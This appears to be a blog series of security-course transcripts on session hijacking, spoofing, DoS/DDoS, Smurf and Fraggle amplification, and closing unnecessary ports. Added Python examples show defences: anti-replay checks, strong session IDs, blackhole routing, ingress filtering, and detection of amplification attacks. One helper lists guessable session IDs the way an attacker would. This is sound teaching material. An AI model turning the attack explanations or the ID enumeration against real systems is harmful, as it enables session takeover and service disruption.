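As an added example (not from the episode), here is the nonce-and-timestamp defence described above written out in Python. Each message carries a random nonce and a timestamp and is signed with an HMAC over both; the receiving side accepts it only if the signature verifies, the timestamp is within a short window, and the nonce has never been seen before. A captured message therefore fails when it is sent a second time even though it was perfectly valid the first time. The shared key, the 30-second window and the JSON message format are assumptions made for the example.

```python
"""Anti-replay check for an authentication message (added example)."""
import hashlib
import hmac
import json
import secrets
import time

SHARED_KEY = b"example-shared-secret"   # assumption: a pre-shared key for the demo
WINDOW_SECONDS = 30                      # assumption: clock skew we tolerate


def make_message(user, key=SHARED_KEY, now=None):
    """Build a signed login message: {user, nonce, ts} plus an HMAC tag."""
    body = {
        "user": user,
        "nonce": secrets.token_hex(16),                      # 128 random bits
        "ts": int(now) if now is not None else int(time.time()),
    }
    payload = json.dumps(body, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return {"payload": payload, "tag": tag}


class ReplayGuard:
    """Server-side acceptor that refuses stale, forged or replayed messages."""

    def __init__(self, key=SHARED_KEY, window=WINDOW_SECONDS):
        self.key = key
        self.window = window
        self.seen = {}   # nonce -> timestamp, so old nonces can be evicted

    def accept(self, message, now=None):
        now = now if now is not None else time.time()
        # 1. Integrity: the tag must match, compared in constant time.
        expected = hmac.new(self.key, message["payload"], hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message["tag"]):
            return False, "bad signature"
        body = json.loads(message["payload"])
        # 2. Freshness: outside the window the message is dead, replayed or not.
        if abs(now - body["ts"]) > self.window:
            return False, "stale timestamp"
        # 3. Uniqueness: forget nonces that can no longer pass the window check,
        #    then reject any nonce we have already accepted.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if body["nonce"] in self.seen:
            return False, "replayed nonce"
        self.seen[body["nonce"]] = body["ts"]
        return True, "ok"


if __name__ == "__main__":
    guard = ReplayGuard()
    captured = make_message("vijay")
    print(guard.accept(captured))   # first delivery is accepted
    print(guard.accept(captured))   # the replay is refused
```

Without the nonce the timestamp alone would still let an attacker replay within the window, and without the timestamp the nonce set would grow forever; the two together keep the state bounded and the replay window closed.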



Dec 11, 2021 08:59
What is Hijacking ? How it is performed in Internet world & How many types are there ...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 75. Today we're going to discuss hijacking, which is the exploitation of a computer session in an attempt to gain unauthorized access to data, services or other resources on a computer or server. There are eight types of session hijacking that can be performed: session theft, TCP/IP hijacking, blind hijacking, clickjacking, man-in-the-middle, man-in-the-browser, the watering hole attack, and cross-site scripting attacks. The first type of hijacking is known as session theft. With session theft the attacker guesses or steals the session ID for a web session, and that enables them to take over the already authorized and established session of that client. Each session is uniquely identified with a random string, but if the attacker can determine or guess that string, they can take over the authenticated session with the server. In this example, the theft is occurring at the session layer of the OSI model, but it can also occur at the network or transport layer. When it does, it's called TCP/IP hijacking, because it occurs when an attacker takes over a TCP session between two computers without the need of a cookie or other host access. Because TCP sessions only authenticate during the initial three-way handshake, the attacker can jump into the session at any time if they can guess the next sequence number in the stream; modern operating systems randomize their initial sequence numbers to make that guess much harder. This can also be combined with a denial of service attack against the original host, so that the attacker can take over the session and not let that person jump back in. The next type of hijacking is called blind hijacking, because it occurs when the attacker blindly injects data into a communication stream and isn't able to see the results, whether they were successful or not. Clickjacking is our next type. This attack uses multiple transparent layers to trick a user into clicking on a button or link on a page when they were intending to click on something else. Basically, the hyperlink to the malicious content is hidden under some legitimate clickable content, so you think you're clicking on an image and you're actually clicking on a link that takes you elsewhere. A man-in-the-middle attack is probably the attack you've heard of most before, and it's also one that is commonly used in session hijacking. A man-in-the-middle attack causes data to flow through the attacker's computer, where it can be intercepted or manipulated as it passes through. This is considered an active type of interception. So let's pretend that you've got some kind of malware on your computer and now all of your traffic routes through the attacker's machine. Well, if you wanted to transfer $50 from your bank account to your friend's, but the attacker changes the amount and the destination account, you may now be sending $5,000 to the attacker instead of $50 to your friend. This is the idea of a man-in-the-middle: since the attacker is sitting right in the middle of that connection, they can see and manipulate any data as it's being sent back and forth. A man-in-the-browser is very similar to a man-in-the-middle, except it's limited to your browser's web communication instead of the entire communication. This can occur because a Trojan has infected your vulnerable web browser and is modifying web pages or transactions that are being done within that browser. To prevent this, you should ensure you have a good anti-malware solution installed and that you have the latest security updates for your web browser, because this will eliminate most man-in-the-browser attacks. Next you have a watering hole. A watering hole is something we described all the way back at the beginning of this course. It occurs when malware is placed on a website that the attacker knows his potential victims are going to access.
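
Session theft, the first type above, only works when the session ID can be guessed. As an added example (not from the episode), the Python below contrasts a predictable ID scheme with one drawn from the operating system's CSPRNG, and shows the server-side habits that go with the strong one: storing only a hash of the ID, rotating it after login so a pre-login ID is worthless, and expiring idle sessions. The helper names, the 15-minute idle timeout and the weak scheme's format are assumptions for the example.

```python
"""Guessable versus unguessable session IDs, with a small session store (added example)."""
import hashlib
import secrets
import time


def weak_session_id(counter, login_time):
    """Predictable ID: a per-server counter joined to the login time."""
    return f"{int(login_time)}-{counter:06d}"


def enumerate_weak_ids(login_time, max_counter):
    """What an attacker does against the weak scheme: list every candidate ID
    for a login time they observed, then try each one against the server."""
    return [weak_session_id(c, login_time) for c in range(max_counter)]


def strong_session_id():
    """256 bits from the OS CSPRNG: infeasible to guess or enumerate."""
    return secrets.token_urlsafe(32)


def _key(session_id):
    # Store only a hash of the ID, so a leaked session table cannot be replayed
    # and lookups do not leak timing information about the secret itself.
    return hashlib.sha256(session_id.encode()).hexdigest()


class SessionStore:
    IDLE_TIMEOUT = 900   # seconds; assumption for the example

    def __init__(self):
        self._sessions = {}   # sha256(session_id) -> {"user": ..., "last_seen": ...}

    def create(self, user, now=None):
        sid = strong_session_id()
        self._sessions[_key(sid)] = {
            "user": user,
            "last_seen": time.time() if now is None else now,
        }
        return sid

    def lookup(self, sid, now=None):
        """Return the user for a valid session ID, or None."""
        now = time.time() if now is None else now
        record = self._sessions.get(_key(sid))
        if record is None:
            return None
        if now - record["last_seen"] > self.IDLE_TIMEOUT:
            del self._sessions[_key(sid)]   # idle too long: expire it
            return None
        record["last_seen"] = now
        return record["user"]

    def rotate(self, sid, now=None):
        """Issue a fresh ID (e.g. right after login) so a pre-login ID is useless."""
        record = self._sessions.pop(_key(sid), None)
        if record is None:
            return None
        new_sid = strong_session_id()
        record["last_seen"] = time.time() if now is None else now
        self._sessions[_key(new_sid)] = record
        return new_sid


if __name__ == "__main__":
    print("weak candidates:", enumerate_weak_ids(1700000000, 3))
    store = SessionStore()
    sid = store.create("vijay")
    print("strong id:", sid, "->", store.lookup(sid))
```

Rotation after login is what defeats session fixation as well: an ID the attacker planted before authentication never becomes an authenticated one.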

Dec 09, 2021 08:54
How Spoofing can be done or what is it ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 74. Today we're going to discuss spoofing. Spoofing is a category of network attacks that occur when an attacker masquerades as another person or system by falsifying their identity. Just like a person uses a mask to cover up their face and hide their true identity, spoofing is the electronic equivalent. We have briefly discussed spoofing a few times already, such as in the case of the DNS amplification attack, where the attacker attempts a distributed denial of service by spoofing the IP address of the victim's server when making the DNS request. We also talked about it when we covered phishing, where an attacker tries to get you to click on a link in an email by falsifying their identity, so that you click the link thinking it's trusted. Anything that identifies a user or system can be spoofed, though. For example, each network interface card has a unique MAC address assigned to it, but MAC spoofing allows the attacker to change their MAC address to pretend that they're using a different device. IP addresses are also commonly used to identify a system, but with IP spoofing the attacker can use somebody else's IP address as part of their attacks. So, how do we prevent spoofing from being used effectively against our systems? Well, the best way is to use proper authentication, preferably multi-factor. When you use proper authentication, you're able to identify a system or user much more accurately, which makes spoofing a name or address alone worthless to the attacker. Keep in mind that authentication protects identities at the application layer; spoofed MAC and IP addresses at the lower layers are dealt with by switch port security and by ingress filtering on your routers, which drops packets whose source address couldn't legitimately have arrived on that interface.



Dec 08, 2021 05:34
How to stop DDoS ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 73. We talked about a denial of service attack involving the continual flooding of a victim system with requests for services, which causes the system to run out of memory and crash. Usually that's one system attacking one system. But that wasn't enough against modern computers, so attackers moved up to the distributed denial of service attack, where hundreds or thousands of machines target a single server to take it down. In late February 2018, the website GitHub was hit by the largest DDoS that had been publicly reported up to that point. Tens of thousands of unique endpoints conducted a coordinated attack, hitting the site with a spike in traffic that peaked at 1.35 terabits per second. This took the website offline for all of about five minutes. So you can see how a DDoS is really hard on a server and can take it down, but not for very long if you can stop it. So your real question probably is, how can you survive one of these attacks, and how can you prevent it from taking down your organization's servers?
Well, we have a couple of techniques. The first one is called blackholing or sinkholing. This technique identifies the attacking IP addresses and routes all of their traffic to a null interface, where it is simply discarded (blackholing), or to a server set up to absorb and analyze it (sinkholing). This effectively stops the attack. Unfortunately, the attackers can move to new IP addresses and restart the attack all over again, so this is only a temporary solution. Intrusion prevention systems can also be used to identify and respond to denial of service attacks. This works for small-scale attacks against your network, but you're not going to have enough processing power to handle a large-scale DDoS. Now, one of the most effective methods is to have an elastic cloud infrastructure. If you've built your infrastructure so that it can scale up when demand increases, you can ride out a DDoS attack. The problem with this strategy, though, is that most service providers charge you based on the capacity and resources you used, so when you scale up, you're going to get a much larger bill from that service provider than you were expecting, and you're not getting a return on that investment, because all of this traffic was wasted; it wasn't generating any revenue for you. So there are some specialized cloud providers out there that have taken on this challenge. Providers like Cloudflare and Akamai are designed to help you ride out these DDoS attacks. They provide web application filtering and content distribution on behalf of your organization, and they focus on running highly robust, highly available networks that can absorb these high-bandwidth attacks. This also gives you additional layers of defense at several layers of the OSI model, and it's going to provide you with additional protections.
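
Blackholing starts with deciding which sources are flooding you. As an added example (not from the episode), the Python below counts requests per source address in a sliding one-second window over a request log, reports every source whose peak exceeds a threshold, and renders the iproute2 null-route commands that would discard that source's traffic. The log is a constructed sample and the threshold is an assumption; on a real service it would be tuned to normal peak traffic, and the routes would usually be pushed to the edge router (or announced to the upstream as a remotely triggered blackhole) rather than added on the server itself.

```python
"""Find flooding sources in a request log and emit null routes for them (added example)."""
from collections import defaultdict, deque

# Constructed sample: (timestamp in milliseconds, source_ip).
SAMPLE_REQUESTS = (
    [(10_000 + i * 500, "198.51.100.20") for i in range(6)]     # 2 req/s, a normal client
    + [(10_000 + i * 10, "203.0.113.5") for i in range(300)]    # 100 req/s for 3 s: flooder
    + [(11_000 + i * 300, "198.51.100.21") for i in range(4)]   # another normal client
)


def find_flooders(requests, threshold=50, window_ms=1000):
    """Return {ip: peak requests seen within any window_ms} for sources over threshold."""
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    peak = defaultdict(int)
    for ts, ip in sorted(requests):
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window_ms:   # slide the window forward
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > threshold}


def null_route_commands(flooders):
    """iproute2 commands that discard the flooders' traffic with a blackhole route."""
    return [f"ip route add blackhole {ip}/32" for ip in sorted(flooders)]


if __name__ == "__main__":
    flooders = find_flooders(SAMPLE_REQUESTS)
    for ip, n in flooders.items():
        print(f"{ip}: peak {n} requests/s")
    print("\n".join(null_route_commands(flooders)))
```

The sample flags only 203.0.113.5 (peak of 101 requests in one second); the two normal clients never exceed four. A real DDoS spreads across thousands of sources that each stay under any sensible per-source threshold, which is exactly why the episode moves on to elastic capacity and scrubbing providers.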



Nov 28, 2021 09:34
What is a Distributed denial of service(DDoS) attack ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 72. In the last lesson we discussed the concept of a denial of service attack and went over the different types of them, but most modern systems can't be taken down by a single machine attempting a denial of service anymore, so attackers got smarter and created the distributed denial of service, or DDoS. A distributed denial of service attack, instead of using a single machine to target one server, uses hundreds or even thousands of machines to launch an attack simultaneously against a single server and force it offline, creating that denial of service condition. Usually the machines that conduct the attack don't even realize that they're part of it. Generally these machines have become zombies, or bots, inside a large botnet, and when they receive the command to attack, they all simultaneously send their payloads against a single victim. In addition to the basic forms of DDoS attack, there is one specific type called a DNS amplification attack. This specialized DDoS allows an attacker to generate a high volume of packets intended to flood a victim's website by sending DNS requests with the source address spoofed to the target's IP address. The DNS servers answer those requests and send their responses to the victim, believing the requests were valid. Because a DNS request uses very little bandwidth to send but the response is usually much larger, the attack is amplified against the victim's server. And because thousands of these requests are being made simultaneously by the zombies in a botnet on behalf of the victim's server, the victim is quickly overwhelmed with far more data than its bandwidth can carry, causing the denial of service condition to occur.
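
Both the IP spoofing in the spoofing episode above and the spoofed-source DNS requests in this amplification attack depend on a network that forwards packets with source addresses that could not have come from where they entered. As an added example (not from the episode), the Python below models the ingress filter a router applies in the spirit of BCP 38 / strict unicast reverse-path forwarding: packets arriving from the customer LAN must carry a source inside that LAN's prefixes, and packets arriving from the internet must not claim an internal or reserved source. The interfaces, prefixes and packets are constructed sample data.

```python
"""Ingress (anti-spoofing) filter in the style of BCP 38 / strict uRPF (added example)."""
import ipaddress

# Assumed topology: customer LAN prefixes behind eth1, the internet behind eth0.
PREFIXES_BY_INTERFACE = {
    "eth1": ["192.168.1.0/24", "10.20.0.0/16"],
}
INTERNET_IF = "eth0"

# Sources that should never appear on the internet-facing interface.
PRIVATE_OR_RESERVED = [ipaddress.ip_network(p) for p in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/8",
)]


def _internal_networks():
    nets = []
    for prefixes in PREFIXES_BY_INTERFACE.values():
        nets.extend(ipaddress.ip_network(p) for p in prefixes)
    return nets


def should_forward(interface, src_ip):
    """Return (True, 'ok') or (False, reason) for a packet arriving on `interface`."""
    src = ipaddress.ip_address(src_ip)
    if interface == INTERNET_IF:
        # Outside packets claiming to be inside hosts are spoofed by definition.
        if any(src in n for n in _internal_networks()):
            return False, "internal source arriving from the internet"
        if any(src in n for n in PRIVATE_OR_RESERVED):
            return False, "bogon source address"
        return True, "ok"
    # Customer side: the source must belong to a prefix routed via this interface,
    # so a LAN host cannot send packets stamped with a victim's address.
    allowed = [ipaddress.ip_network(p) for p in PREFIXES_BY_INTERFACE.get(interface, [])]
    if any(src in n for n in allowed):
        return True, "ok"
    return False, f"source {src} is not routed via {interface} (spoofed?)"


# Constructed packets: (arrival_interface, src_ip, dst_ip)
SAMPLE_PACKETS = [
    ("eth1", "192.168.1.45", "203.0.113.53"),   # normal DNS query from the LAN
    ("eth1", "198.51.100.7", "203.0.113.53"),   # LAN host spoofing a victim's IP
    ("eth0", "192.168.1.1", "192.168.1.45"),    # outsider pretending to be the gateway
    ("eth0", "203.0.113.53", "192.168.1.45"),   # legitimate reply from outside
]


def filter_packets(packets):
    """Return [(src_ip, forwarded?)] for each sample packet."""
    return [(src, should_forward(iface, src)[0]) for iface, src, _ in packets]


if __name__ == "__main__":
    for iface, src, dst in SAMPLE_PACKETS:
        ok, why = should_forward(iface, src)
        print(f"{iface} {src} -> {dst}: {'forward' if ok else 'DROP'} ({why})")
```

The second packet is the one that matters for amplification: with this filter in place at the attacker's own edge, the spoofed query never leaves the network, so the open resolver never sends its large answer to the victim.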



Nov 23, 2021 04:17
What is Denial of Service attack ?


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 71. Today we're going to focus on the concept of a denial of service attack. A denial of service attack isn't a specific attack in and of itself, but a category of attacks that can be carried out in a number of different ways. Essentially, the term denial of service is used to describe any attack which attempts to make a computer's or service's resources unavailable, and it can be extended to network devices like switches and routers as well. There are five subcategories of denial of service attacks: flooding attacks, the ping of death, the teardrop, the permanent denial of service attack, and the fork bomb. The first category is the flood attack. This is a specialized type of denial of service which attempts to send more packets to a single server or host than it can handle. So, in this example, we see an attacker sending 12 requests at a time to a server. Normally a server wouldn't be overloaded by just 12 requests, but if I could send 1,200 or 12,000, that might allow me to flood that server and take it down. Under flood attacks we have a few specialized varieties that you're going to come across. The first is the ping flood. This attack happens when somebody attempts to flood your server by sending too many pings. A ping is technically an ICMP echo request packet, but everyone likes to call it a ping. Because ping floods have become so commonplace, many organizations now simply drop inbound ICMP echo requests at the firewall. This results in the attacker simply getting a request timed out message, the service remains online, and the denial of service is stopped. Next we have the Smurf attack. This is like a ping flood, but instead of trying to flood a server by sending pings directly to it, the attacker amplifies the attack by sending the ping to a subnet's broadcast address, using the spoofed IP of the target server as the source. This causes all of the devices on that subnet to reply to the victim server with ICMP echo replies, which eats up a lot of bandwidth and processing power. You can see how this looks here: the attacker sends the ping request with the IP of the server spoofed into the source, and the destination is the broadcast address of that subnet. In this example, all three PCs in the subnet reply to that ping request thinking it came from the server, so the server gets three times as many ping replies as if the attacker had sent the pings directly. This allows the attack to be amplified, especially if the attacker can find a large subnet, like a /16 or a /8, to use in the attack. That amplification only works if routers forward directed broadcasts and hosts answer them, so both should be turned off: on Linux the sysctl net.ipv4.icmp_echo_ignore_broadcasts=1 does that for hosts, and most modern routers drop directed broadcasts by default. The next kind of flood attack is what we call Fraggle. Fraggle is a throwback reference to the kids' show Fraggle Rock from the 1980s, which aired around the same time as the Smurfs TV show, so you can guess that Fraggle and Smurf are related. With Fraggle, instead of using an ICMP echo request, the attacker uses a UDP echo instead. This traffic is directed to UDP port 7, which is the echo port, and UDP port 19, which is the character generation (chargen) port. This is an older attack, and most networks don't have this vulnerability anymore, because both of these ports are usually closed; again, they're unnecessary. Notice that I didn't have them in your port memorization chart either. Because of this, Fraggle attacks are considered very uncommon today. That said, a UDP flood attack, which is a variant of Fraggle, is still heavily used these days. It works basically the same way as a Fraggle attack, but it uses different UDP ports.
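
Smurf and Fraggle share one signature: a packet aimed at a subnet's directed broadcast address whose source is the victim that will receive all the replies. As an added example (not from the episode), the Python below classifies packets against that signature, given the local subnets, and tallies suspicious broadcast packets by the spoofed source, which is the address you would expect to see under attack. The subnets and packets are constructed sample data; in practice you would run it over a capture from the subnet's router.

```python
"""Flag packets carrying the Smurf and Fraggle signature (added example)."""
import ipaddress
from collections import Counter

# Assumed local subnets; their broadcast addresses are the amplifiers.
LOCAL_SUBNETS = [ipaddress.ip_network(s) for s in ("192.168.1.0/24", "10.20.0.0/16")]
FRAGGLE_PORTS = {7, 19}   # UDP echo and chargen
ICMP_ECHO_REQUEST = 8


def is_directed_broadcast(dst_ip):
    """True for the broadcast address of any local subnet, or the limited broadcast."""
    dst = ipaddress.ip_address(dst_ip)
    if dst == ipaddress.ip_address("255.255.255.255"):
        return True
    return any(dst == net.broadcast_address for net in LOCAL_SUBNETS)


def classify(packet):
    """Return 'smurf', 'fraggle' or None for one packet dict."""
    if not is_directed_broadcast(packet["dst"]):
        return None
    if packet["proto"] == "icmp" and packet.get("type") == ICMP_ECHO_REQUEST:
        return "smurf"
    if packet["proto"] == "udp" and packet.get("dport") in FRAGGLE_PORTS:
        return "fraggle"
    return None   # other broadcast traffic (DHCP, NetBIOS, ...) is normal


# Constructed packets. The 203.0.113.9 "source" is the victim being spoofed.
SAMPLE_PACKETS = [
    {"src": "192.168.1.45", "dst": "192.168.1.1",   "proto": "icmp", "type": 8},    # normal ping
    {"src": "203.0.113.9",  "dst": "192.168.1.255", "proto": "icmp", "type": 8},    # smurf
    {"src": "203.0.113.9",  "dst": "192.168.1.255", "proto": "icmp", "type": 8},    # smurf
    {"src": "203.0.113.9",  "dst": "10.20.255.255", "proto": "udp",  "dport": 7},   # fraggle
    {"src": "192.168.1.45", "dst": "192.168.1.255", "proto": "udp",  "dport": 137}, # NetBIOS, benign
]


def amplification_report(packets):
    """Count suspicious broadcast packets per (spoofed source, attack type)."""
    report = Counter()
    for p in packets:
        kind = classify(p)
        if kind:
            report[(p["src"], kind)] += 1
    return dict(report)


if __name__ == "__main__":
    for (src, kind), n in amplification_report(SAMPLE_PACKETS).items():
        print(f"{kind}: {n} broadcast packet(s) spoofed from {src}")
```

Every host on 192.168.1.0/24 that answers the two Smurf packets sends an echo reply to 203.0.113.9, so the count per source is a lower bound on what the victim receives, multiplied by the number of responding hosts.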


Nov 22, 2021 17:02
What are Unnecessary ports ? How to close it....


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 70. Today we're going to discuss unnecessary ports. As we've already discussed, there are a lot of ports available for use by your computers and networks. We started out with 65,536 ports back in our ports and protocols lesson. Then we narrowed it down to 35 ports that you just had to memorize in the last lesson. But does that mean all 35 of those are necessary for your computer to function? Well, the answer is no. When it comes down to it, you aren't using all of those services, at least not all of the time. Also, if you're running a server, you wouldn't want all 35 of those ports open either. Why? Because many of them are unnecessary. Now, that begs the question: what makes a port unnecessary? An unnecessary port is simply one that's associated with a service or function that you don't need, or that is considered non-essential. For example, if you have a server whose entire function is to act as a mail relay, all it's designed to do is send mail out, then it only needs a couple of ports open. It needs port 25 for SMTP, and port 465 (SMTP over implicit TLS) or 587 (the submission port, which upgrades to TLS with STARTTLS). Every other port on that server can be shut, disabled or closed and you wouldn't care, because only those three ports are the ones you need. Remember, every open port you don't need is an unnecessary exposure, so you want to close anything you're not using. Because of this, security professionals and analysts routinely scan their servers, routers and firewalls to make sure they understand exactly which ports are open in their networks, and which ones they can disable or close. For example, here is a result from one of my scans, and you can see there are three hosts that have ports 139 and 445 open on the network. Thinking back to our last lesson, where you memorized all the ports, can you guess which services these machines might be running? Well, port 139 is used for the NetBIOS session service and port 445 is used for SMB. This means these three machines are most likely running the Windows operating system and have file sharing enabled over the local network. Now, if these machines don't need file sharing enabled over the local network, we can close these ports and remove the possible vulnerabilities that are inherent in the Windows file-sharing system. To close an unnecessary port there are three methods you can use. First, you can stop the service that uses the port from the operating system's graphical user interface. To do that in Windows, simply open the Computer Management console, select Services and Applications, and then select Services. From here, double-click on the particular service that you want to turn off, and it opens a dialog box as shown here. In this example I've stopped the Windows Update service in Windows 10 from running, which also closes any ports that were only open because that service was running. The second method is to do this from the command line. As I showed you back in our operating system hardening lessons, you can turn off a service in Windows by using the net stop command followed by the name of the service. On a modern Linux server you do this with sudo systemctl stop followed by the service name (older Upstart-based systems used sudo stop and the service name), and you keep it from coming back at boot with sudo systemctl disable. The third way is to block the ports at your firewall, whether that's a software or hardware-based firewall or the host firewall on the server itself. Usually a firewall blocks ports by default and requires you to open a port when you install a particular service or function. For example, let's say you installed the Apache web server at one point, and this opened up port 80 on your firewall.
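
Scanning tells you what is open; the decision that follows is whether each port belongs on that server's role. As an added example (not from the episode), the Python below parses the output of the Linux ss -tuln command (a constructed sample here; on a real host capture the real output) and reports every network-reachable listening socket that is not on the allowlist for the host's role. The role allowlists are assumptions drawn from the mail-relay example above, with SSH allowed everywhere for administration.

```python
"""Compare listening ports against the ports a server role actually needs (added example)."""

# Assumed role allowlists: (protocol, port) pairs the role legitimately exposes.
ROLE_ALLOWLIST = {
    "mail-relay": {("tcp", 25), ("tcp", 465), ("tcp", 587)},
    "web": {("tcp", 80), ("tcp", 443)},
}
ALWAYS_OK = {("tcp", 22)}   # assumption: SSH is how the box is administered

# Constructed sample of `ss -tuln` output from a mail relay that also has
# Windows-style file sharing (Samba) listening on 139 and 445.
SAMPLE_SS_OUTPUT = """\
Netid  State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port
udp    UNCONN  0       0        127.0.0.53%lo:53          0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
tcp    LISTEN  0       100            0.0.0.0:25          0.0.0.0:*
tcp    LISTEN  0       100            0.0.0.0:587         0.0.0.0:*
tcp    LISTEN  0       50             0.0.0.0:139         0.0.0.0:*
tcp    LISTEN  0       50             0.0.0.0:445         0.0.0.0:*
tcp    LISTEN  0       128               [::]:22             [::]:*
"""


def parse_listeners(text):
    """Yield (proto, local_addr, port) for every listening / unconnected socket."""
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        proto, state, local = fields[0], fields[1], fields[4]
        if state not in ("LISTEN", "UNCONN"):
            continue
        addr, _, port = local.rpartition(":")   # handles [::]:22 and 0.0.0.0:25
        yield proto, addr, int(port)


def unnecessary_ports(text, role):
    """Return sorted (proto, port) pairs listening on the network but not allowed for `role`."""
    allowed = ROLE_ALLOWLIST[role] | ALWAYS_OK
    extra = set()
    for proto, addr, port in parse_listeners(text):
        if addr.startswith("127.") or addr.startswith("[::1]"):
            continue   # loopback-only listeners are not reachable from the network
        if (proto, port) not in allowed:
            extra.add((proto, port))
    return sorted(extra)


if __name__ == "__main__":
    for proto, port in unnecessary_ports(SAMPLE_SS_OUTPUT, "mail-relay"):
        print(f"close or firewall {proto}/{port}")
```

On the sample the relay is flagged for tcp/139 and tcp/445 only; the stub resolver on 127.0.0.53 is ignored because nothing outside the host can reach it.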

Nov 21, 2021 10:26
What exactly ports & protocols does in our laptops...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 69. In security, one of the most important things is to ensure that you understand what openings you have created in your systems. When it comes to computers and networks, most of these openings are created by ports. A port is simply a logical communication endpoint that exists on your computer or server. For example, if you're running a web server, you're going to have port 80 open and listening for inbound requests from your potential visitors. Ports are classified as either inbound or outbound. An inbound port is used when your computer or server is listening for a connection. Just as in my earlier example, the web server had port 80 open; that's an inbound port. It's just waiting for somebody to come along and connect to it. An outbound port, on the other hand, is opened by a computer whenever it wants to connect to a server. If my computer is attempting to make a connection to your web server over port 80, then my computer opens up a random high-numbered port, such as port 52363, and makes an outbound request to that web server from it. Now, what does all this look like in the real world? Let's look at an example of how an inbound and an outbound port are used when my laptop attempts to connect to a remote server over SSH. First, we have a server at the top of the screen. It has a public IP address assigned to it and it's listening on port 22, so port 22 is the inbound port awaiting new connections, and in this case port 22 is open. At the bottom of the screen, I have my laptop that wants to make the connection. My laptop has a private IP address assigned, because my network is using NAT at the router, and that gives me some additional protection. Notice that at this point my laptop doesn't have any ports open yet. Now my laptop wants to establish the SSH connection. It opens up an outbound port on itself, which is going to be some random high-numbered port like 51233, and it sends a request to the SSH server on port 22, the server's inbound port, destined for the server's IP address, in this case 46.124.63.13. Once the server receives this request, it has to respond. So it sends a packet of information back to my laptop's IP address and to the outbound port that was opened, in this case port 51233. In reality the reply would go to the public-facing IP address of my router, which NAT translates back to my laptop, but for our example I'm going to use the private IP address of 192.168.1.45. Now that my laptop has made the request to the server and the server has answered, we have a session established and both devices can communicate back and forth as needed. Once that session is over, the connection is closed: my laptop closes its outbound port, because it's no longer needed, and the server keeps its inbound port open so it can receive requests from the next user. So, now that we've shown how ports work in the real world, let's talk a little more about the ports themselves. In addition to being called inbound or outbound, each port is assigned a number. The number can be anywhere between 0 and 65,535, but this big range is divided into three smaller groups. The first group is the well-known ports, which are the ports between 0 and 1023. These are called well-known ports because they are designated by IANA, the Internet Assigned Numbers Authority, which assigns them to commonly used protocols and services.
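
The inbound/outbound exchange above can be watched on a single machine. As an added example (not from the episode), the Python below starts a listener on the loopback address (asking the OS for a free port in place of the episode's port 22), connects a client to it, and records which port each side used: the server's fixed listening port, and the random high-numbered port the OS hands the client for its outbound side. Both sides report the same client port, which is how the server knows where to send its reply.

```python
"""An inbound (listening) port and an outbound (ephemeral) port in action (added example)."""
import socket
import threading


def run_exchange():
    """Perform one client/server round trip on 127.0.0.1 and return the ports used."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free listening port
    server.listen(1)
    server_port = server.getsockname()[1]  # the inbound port, like 22 in the episode
    result = {"server_port": server_port}

    def serve():
        conn, peer = server.accept()       # peer = (client_ip, client_ephemeral_port)
        result["server_saw_client_port"] = peer[1]
        data = conn.recv(1024)
        conn.sendall(b"hello " + data)     # reply goes back to the client's outbound port
        conn.close()

    worker = threading.Thread(target=serve)
    worker.start()

    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(("127.0.0.1", server_port))    # OS assigns the outbound port now
    result["client_port"] = client.getsockname()[1]
    client.sendall(b"laptop")
    result["reply"] = client.recv(1024)
    client.close()                                # outbound port released when done
    worker.join()
    server.close()   # a real server keeps listening here for the next client
    return result


if __name__ == "__main__":
    r = run_exchange()
    print(f"server listened on {r['server_port']}, client used ephemeral port "
          f"{r['client_port']} (server saw {r['server_saw_client_port']}), "
          f"reply: {r['reply']!r}")
```

Run it a few times and the client port changes every time while nothing about the server side needs to; that asymmetry is why firewalls can allow established return traffic without opening any fixed high ports.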

Nov 19, 2021 14:23
A small Intro of Network attacks...


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 68. In this section of the course we're going to discuss network attacks. There are many different types of threats out there, and many of them carry out their attacks over your networks. These attacks include things like denial of service attacks, spoofing, hijacking, replays, transitive attacks, DNS attacks and ARP poisoning. Before we get into all of those different types of attacks, though, it's important for us to do a quick review of the basics of ports and protocols that you learned back in Network+. After all, the exam is going to focus on particular ports and protocols and how best to secure them. So let's get started with our review of ports and protocols in the next lesson.



Aug 29, 2021 01:53
Defending Servers....


Hello everyone, my name is Vijay Kumar Devireddy and I am glad to have you back on my episode 67. We have spent a lot of time discussing the cloud in this section, but the cloud is made up of a lot of different types of servers. In this lesson we're going to discuss a few specific types of servers that may be hosted in the cloud, and how you can best secure them. First, we have file servers. File servers are used to store, transfer, migrate, synchronize and archive your files. Any computer can act as a file server in the real world; the server might be running Windows, Linux or macOS as its operating system, and it really doesn't matter which. Either way, you want to make sure the file server is using proper encryption for its files when they're at rest, that monitoring and logging are being performed on the server, and that it has a good host-based intrusion detection system. You might also want to use data loss prevention applications to ensure the data isn't stolen, plus all of the normal configuration hardening and patching that we've already discussed during this course. Second, we have email servers. These servers are a frequent target of attacks, because they contain a lot of valuable data from within your organization. In a Windows environment the most common email server is Microsoft Exchange. Microsoft Exchange and its Unix and Linux counterparts all support the POP3, IMAP and SMTP protocols for receiving and sending email. This means that at a minimum we have at least three open ports and services running, but usually there are many, many more. Because email servers are frequently a target of attacks, it's important that you ensure they are securely configured using the hardening 